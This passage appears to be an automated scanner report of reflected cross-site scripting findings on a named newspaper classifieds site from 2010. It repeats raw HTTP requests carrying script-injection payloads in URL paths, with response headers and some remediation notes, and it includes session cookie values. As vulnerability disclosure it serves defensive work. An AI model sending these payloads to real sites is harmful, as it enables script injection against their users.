GET /salee868b"-alert(1)-"5f8d12acc2f/pet/-/-/10036 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:53 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e182a"><script>alert(1)</script>fff8b27e3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /salee182a"><script>alert(1)</script>fff8b27e3f/pet/-/-/10036 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:52 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e044"-alert(1)-"f441c0c204f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sale3e044"-alert(1)-"f441c0c204f/tickets/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:55 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c054f"><script>alert(1)</script>415fffba3b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /salec054f"><script>alert(1)</script>415fffba3b2/tickets/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:54 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13816"-alert(1)-"284747a558c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /service13816"-alert(1)-"284747a558c/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:55 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 432b1"><script>alert(1)</script>30b054d92d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service432b1"><script>alert(1)</script>30b054d92d2/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:54 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d9d"><script>alert(1)</script>cb3ffe9143a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle43d9d"><script>alert(1)</script>cb3ffe9143a/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:43 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Mzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d140d"-alert(1)-"874e3b12df9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vehicled140d"-alert(1)-"874e3b12df9/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:44 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94da2"-alert(1)-"4da2e933c11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vehicle94da2"-alert(1)-"4da2e933c11/boat/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:51 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e0f"><script>alert(1)</script>b8143a09c17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle94e0f"><script>alert(1)</script>b8143a09c17/boat/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:50 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f2e"><script>alert(1)</script>62a9b46aed7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle89f2e"><script>alert(1)</script>62a9b46aed7/commercial_truck/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:45 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca932"-alert(1)-"95e05810fb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vehicleca932"-alert(1)-"95e05810fb1/commercial_truck/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:45 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8c9a"-alert(1)-"1920298d3be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
